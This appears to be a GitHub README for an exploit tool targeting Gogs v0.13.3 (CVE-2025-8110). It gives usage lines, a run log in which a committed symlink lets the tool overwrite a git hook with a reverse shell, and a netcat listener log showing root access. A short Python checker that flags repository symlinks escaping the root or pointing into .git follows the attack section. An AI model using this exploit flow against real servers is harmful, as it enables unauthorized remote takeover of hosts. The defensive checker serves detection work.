manbahadurthapa1248/CVE-2025-8110-Authenticated-Remote-Code-Execution-on-Gogs-v0.13.3-
This project provides an authenticated remote code execution exploit for Gogs v0.13.3, used to obtain a reverse shell when valid credentials are available.
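# CVE-2025-8110-Gogs v0.13.3 Authenticated Remote Code Execution
Remote code execution on Gogs (v0.13.3) that yields a reverse shell.
The exploit requires authentication credentials and an API token to work.
# Usage: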
```
kali@kali: python3 gogs_rce.py
usage: gogs_rce.py [-h] -t TARGET -l LHOST -lp LPORT -e EMAIL -p PASSWORD -a TOKEN
gogs_rce.py: error: the following arguments are required: -t/--target, -l/--lhost, -lp/--lport, -e/--email, -p/--password, -a/--token
```
```
kali@kali: python3 gogs_rce.py -t http://target -l Listener_ip -lp 4444 -e hello@test.com -p hello123 -a token_here
[*] Target: http://target
[*] Identifying internal username from email...
[+] Authenticated as: hello (hello@test.com)
[*] Creating repository: pwn_rev_1775970279
[*] Initializing local repo and pushing symlink...
[master (root-commit) 49428b8] link creation
1 file changed, 1 insertion(+)
create mode 120000 evil.link
[*] Fetching SHA and overwriting hook with reverse shell...
[*] TRIGGERING: Check your listener on 4444...
[master d027fb0] trigger rce
1 file changed, 1 insertion(+)
create mode 100644 trigger.txt
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 272 bytes | 272.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
[+] Push timed out (this is normal when reverse shell is active).
[+] Done.
```
This gives a reverse shell as the user running the Gogs process.
```
kali@kali: nc -nlvp 4444
listening on [any] 4444 ...
connect to [ListenIP] from (UNKNOWN) [TargetIp] 39180
root@TargetIp:~/gogs-repositories/hello/pwn_rev_1775971368.git# id
id
uid=0(root) gid=0(root) groups=0(root)
```
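The run log above shows a symlink entry (`create mode 120000`) being committed before the hook is overwritten. The following is an added defensive example, not code from this repository or from Gogs: it flags symlink tree entries whose target is absolute, climbs out of the repository, or resolves into `.git`. The function names and the sample records are assumptions constructed for illustration; in practice the mode and path come from `git ls-tree -r <rev>` and the target from the blob content (`git cat-file -p <sha>`).

```python
import posixpath

SYMLINK_MODE = "120000"  # git tree mode for a symbolic link


def resolve_link(link_path, target):
    """Resolve a symlink target relative to the repository root.

    Returns the normalized repo-relative path, or None when the target is
    absolute or climbs above the repository root.
    """
    if target.startswith("/"):
        return None
    base = posixpath.dirname(link_path)
    resolved = posixpath.normpath(posixpath.join(base, target))
    if resolved == ".." or resolved.startswith("../"):
        return None
    return resolved


def audit_tree(entries):
    """Return (path, target, reason) for every suspicious symlink entry."""
    findings = []
    for mode, path, target in entries:
        if mode != SYMLINK_MODE:
            continue  # regular files and directories are not checked here
        resolved = resolve_link(path, target)
        if resolved is None:
            findings.append((path, target, "leaves repository root"))
        # Compare case-insensitively: some filesystems treat .GIT as .git
        elif resolved.lower() == ".git" or resolved.lower().startswith(".git/"):
            findings.append((path, target, "resolves into .git"))
    return findings


# Constructed sample records: (mode, path, symlink target)
SAMPLE_TREE = [
    ("100644", "README.md", ""),
    ("120000", "docs/latest", "v2/index.md"),       # stays inside the repo
    ("120000", "up.link", "../../elsewhere/file"),  # climbs out of the repo
    ("120000", "sub/meta.link", "../.git/HEAD"),    # lands in git metadata
    ("120000", "abs.link", "/etc/hostname"),        # absolute target
]

if __name__ == "__main__":
    for path, target, reason in audit_tree(SAMPLE_TREE):
        print(f"{path} -> {target}: {reason}")
```
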